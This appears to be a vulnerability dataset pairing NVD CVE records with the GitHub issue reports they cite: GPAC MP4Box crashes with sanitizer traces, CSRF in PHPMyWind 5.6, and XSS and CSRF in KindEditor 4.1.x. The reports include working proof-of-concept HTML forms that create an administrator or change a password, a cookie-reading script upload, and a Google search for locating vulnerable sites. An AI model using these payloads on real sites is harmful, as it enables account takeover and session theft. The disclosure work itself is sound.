[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1339
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ √] I looked for a similar issue and couldn't find any. - [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in av_parsers.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [001gf_media_nalu_remove_emulation_bytes](https://github.com/gutiniao/afltest/blob/master/001gf_media_nalu_remove_emulation_bytes) The ASAN information is as follows: ``` ./MP4Box -diso 001gf_media_nalu_remove_emulation_bytes -out /dev/null [iso file] Media header timescale is 0 - defaulting to 90000 ================================================================= ==23148==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000002d1 at pc 0x5632845c98b0 bp 0x7ffdce21c4e0 sp 0x7ffdce21c4d0 READ of size 1 at 0x6020000002d1 thread T0 #0 0x5632845c98af in gf_media_nalu_remove_emulation_bytes media_tools/av_parsers.c:4722 #1 0x5632845c991b in gf_media_avc_read_sps media_tools/av_parsers.c:4737 #2 0x5632843ea9a9 in avcc_Read isomedia/avc_ext.c:2371 #3 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #4 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #5 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #6 0x5632848afbf1 in video_sample_entry_Read isomedia/box_code_base.c:4405 #7 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #8 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #9 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #10 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #11 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #12 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #13 0x5632848b38a4 in stbl_Read isomedia/box_code_base.c:5381 #14 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #15 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #16 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #17 0x5632848ad40b in minf_Read isomedia/box_code_base.c:3500 #18 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #19 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #20 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #21 0x5632848ab73f in mdia_Read isomedia/box_code_base.c:3021 #22 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #23 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #24 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #25 0x5632848ba906 in trak_Read isomedia/box_code_base.c:7129 #26 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528 #27 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #28 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #29 0x5632848adf64 in moov_Read isomedia/box_code_base.c:3745 #30 0x563284419b35 in gf_isom_box_read isomedia/box_funcs.c:1528 #31 0x563284419b35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #32 0x56328441a1e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #33 0x563284430f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #34 0x563284433bca in gf_isom_open_file isomedia/isom_intern.c:615 #35 0x56328417c852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #36 0x7f0252bccb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #37 0x56328416db19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) 0x6020000002d1 is located 0 bytes to the right of 1-byte region [0x6020000002d0,0x6020000002d1) allocated by thread T0 here: #0 0x7f0253855b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x5632843ea263 in avcc_Read isomedia/avc_ext.c:2343 SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4722 in gf_media_nalu_remove_emulation_bytes Shadow bytes around the buggy address: 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8020: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8030: fa fa 00 00 fa fa 00 00 fa fa 00 05 fa fa 00 00 0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8050: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa 01 fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==23148==ABORTING ```
There is a heap-buffer-overflow in the gf_media_nalu_remove_emulation_bytes function of av_parsers.c:4722
https://api.github.com/repos/gpac/gpac/issues/1339/comments
1
2019-11-13T03:14:38Z
2020-01-09T17:59:39Z
https://github.com/gpac/gpac/issues/1339
521,931,348
1,339
2,698
CVE-2020-22679
2021-10-12T21:15:07.580
Memory leak in the sgpd_parse_entry function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1345" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1345" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1345
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_base.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [007-memleak-sgpd_parse_entry](https://github.com/gutiniao/afltest/blob/master/007-memleak-sgpd_parse_entry) The ASAN information is as follows: ``` ./MP4Box -diso 007-memleak-sgpd_parse_entry -out /dev/null [iso file] Unknown box type gods in parent moov [iso file] Box "avcC" (start 939) has 34 extra bytes [iso file] Unknown box type 0000 in parent sinf [iso file] Invalid descriptor tag 0xc1 in esds [iso file] Read Box "esds" (start 1491) failed (Invalid IsoMedia File) - skipping [iso file] Invalid descriptor tag 0xc1 in esds [iso file] Read Box "esds" (start 0) failed (Invalid IsoMedia File) - skipping [isom] not enough bytes in box sgpd: 20 left, reading 63 (file isomedia/box_code_base.c, line 9926) [iso file] Read Box "sgpd" (start 1678) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "stbl" (start 1431) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "minf" (start 1371) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "mdia" (start 1298) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "trak" (start 1198) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "moov" (start 351) failed (Invalid IsoMedia File) - skipping Error opening file 007-memleak-sgpd_parse_entry: Invalid IsoMedia File ================================================================= ==6751==ERROR: LeakSanitizer: detected memory leaks Direct leak of 37 byte(s) in 1 object(s) allocated from: #0 0x7f25e0370b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x55e8ff099553 in sgpd_parse_entry isomedia/box_code_base.c:9656 #2 0x55e8ff099553 in sgpd_Read isomedia/box_code_base.c:9922 SUMMARY: AddressSanitizer: 37 byte(s) leaked in 1 allocation(s) ```
There are memory leaks in the sgpd_parse_entry function of box_code_base.c:9656
https://api.github.com/repos/gpac/gpac/issues/1345/comments
1
2019-11-13T05:25:14Z
2020-01-09T18:00:00Z
https://github.com/gpac/gpac/issues/1345
521,967,985
1,345
2,699
CVE-2020-19964
2021-10-14T15:15:08.767
A Cross Site Request Forgery (CSRF) vulnerability was discovered in PHPMyWind 5.6 which allows attackers to create a new administrator account without authentication.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://phpmywind.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/gaozhifeng/PHPMyWind" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaozhifeng/PHPMyWind/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://phpmywind.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/gaozhifeng/PHPMyWind" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaozhifeng/PHPMyWind/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpmywind:phpmywind:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "7B3A030C-77BA-4095-9EFC-7B1109E570CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/gaozhifeng/PHPMyWind/issues/9
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gaozhifeng", "PHPMyWind" ]
Product Homepage: http://phpmywind.com/ Software link: https://github.com/gaozhifeng/PHPMyWind Version: v5.6 The backend code writes the new user data to the database without authentication such as token ```php if($dosql->GetOne("SELECT `id` FROM `$tbname` WHERE `username`='$username'")) { ShowMsg('用户名已存在!', '-1'); exit(); } $password = md5(md5($password)); $loginip = '127.0.0.1'; $logintime = time(); $sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')"; if($dosql->ExecNoneQuery($sql)) { header("location:$gourl"); exit(); } ``` When the background administrator clicks the malicious link, the background will add an administrator user PoC: ```html <html> <body> <form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST"> <html> <form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST"> <input type="hidden" name="username" value="admincsrf" /> <input type="hidden" name="password" value="admin" /> <input type="hidden" name="repassword" value="admin" /> <input type="hidden" name="question" value="0" /> <input type="hidden" name="answer" value="" /> <input type="hidden" name="nickname" value="" /> <input type="hidden" name="levelname" value="1" /> <input type="hidden" name="checkadmin" value="true" /> <input type="hidden" name="action" value="add" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` ![](https://i.loli.net/2019/10/28/2S1CarZeRztv7NY.png)
CSRF vulnerability exists in PHPMyWind v5.6
https://api.github.com/repos/gaozhifeng/PHPMyWind/issues/9/comments
0
2019-10-28T06:19:09Z
2019-10-28T06:19:09Z
https://github.com/gaozhifeng/PHPMyWind/issues/9
513,117,647
9
2,700
CVE-2021-42227
2021-10-14T17:15:08.787
Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via a Google search inurl:/examples/uploadbutton.html and then the .html file on the website that uses this editor (the file suffix is allowed).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kindsoft/kindeditor/issues/336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kindsoft/kindeditor/issues/336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*", "matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18", "versionEndExcluding": null, "versionEndIncluding": "4.1.12", "versionStartExcluding": null, "versionStartIncluding": "4.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kindsoft/kindeditor/issues/336
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kindsoft", "kindeditor" ]
> [Suggested description] > Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via > a Google search inurl:/examples/uploadbutton.html and then the .html > file on the website that uses this editor (the file suffix is allowed). > > ------------------------------------------ > > [Vulnerability Type] > Cross Site Scripting (XSS) > > ------------------------------------------ > > [Vendor of Product] > https://github.com/kindsoft/kindeditor > > ------------------------------------------ > > [Affected Product Code Base] > kindeditor - 4.1.* > > ------------------------------------------ > > [Affected Component] > POST /Public/JS/kindeditor-4.1.10/php/upload_json.php?dir=file HTTP/1.1 > Content-Disposition: form-data; name="imgFile"; filename="iframe.html" > Content-Type: text/html > > <script>alert(document.cookie)</script> > -----------------------------293582696 > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Code execution] > true > > ------------------------------------------ > > [Attack Vectors] > You just need to search in google: inurl:/examples/uploadbutton.html, > Then upload the .html file on the website that uses this editor (the file suffix is allowed)
There is a stored xss vulnerability in kindeditor - 4.1.*
https://api.github.com/repos/kindsoft/kindeditor/issues/336/comments
0
2021-10-14T06:26:59Z
2021-10-14T06:26:59Z
https://github.com/kindsoft/kindeditor/issues/336
1,026,009,823
336
2,701
CVE-2021-42228
2021-10-14T17:15:08.830
A Cross Site Request Forgery (CSRF) vulnerability exists in KindEditor 4.1.x, as demonstrated by examples/uploadbutton.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kindsoft/kindeditor/issues/337" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kindsoft/kindeditor/issues/337" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*", "matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18", "versionEndExcluding": null, "versionEndIncluding": "4.1.12", "versionStartExcluding": null, "versionStartIncluding": "4.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/kindsoft/kindeditor/issues/337
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kindsoft", "kindeditor" ]
> [Suggested description] > Cross Site Request Forgery (CSRF) vulnerability exists in KindEdirot > 4.1.x. First, you upload an html file containing csrf on the website > that uses a google editor, (you only need to search in google: > inurl:/examples/uploadbutton.html) and then use the authority of this > website to trick users into clicking your malicious html link. > > ------------------------------------------ > > [Vulnerability Type] > Cross Site Request Forgery (CSRF) > > ------------------------------------------ > > [Vendor of Product] > https://github.com/kindsoft/kindeditor > > ------------------------------------------ > > [Affected Product Code Base] > kindeditor - 4.1.* > > ------------------------------------------ > > [Affected Component] > To find a website that uses this editor, you only need to search in google: inurl:/examples/uploadbutton.html > Because this is the feature file of this editor > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Code execution] > true > > ------------------------------------------ > > Attackers can use websites trusted by users to perform dangerous operations > > ------------------------------------------ > > [Attack Vectors] > <html> > <head> > <title>csrf test</title> > </head> > <body> > <form action="http://127.0.0.1:2003/dvwa1.9/vulnerabilities/csrf/"> // your target url > <input type="hidden" name="password_new" value="12345678" /> > <input type="hidden" name="password_conf" value="12345678" /> > <input type="hidden" name="Change" value"Change" /> > <input type="submit" value"let's click it!" /> > </form> > </body> > </html> >
There is a csrf vulnerability in kindeditor - 4.1.*
https://api.github.com/repos/kindsoft/kindeditor/issues/337/comments
0
2021-10-14T06:34:58Z
2021-10-14T06:34:58Z
https://github.com/kindsoft/kindeditor/issues/337
1,026,015,699
337
2,702
CVE-2021-28021
2021-10-15T16:15:07.340
Buffer overflow vulnerability in function stbi__extend_receive in stb_image.h in stb 2.26 via a crafted JPEG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1108" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1108" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stb_project:stb:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "FF2E3EE0-725E-48D0-A6A0-F82409594F61", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nothings/stb/issues/1108
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
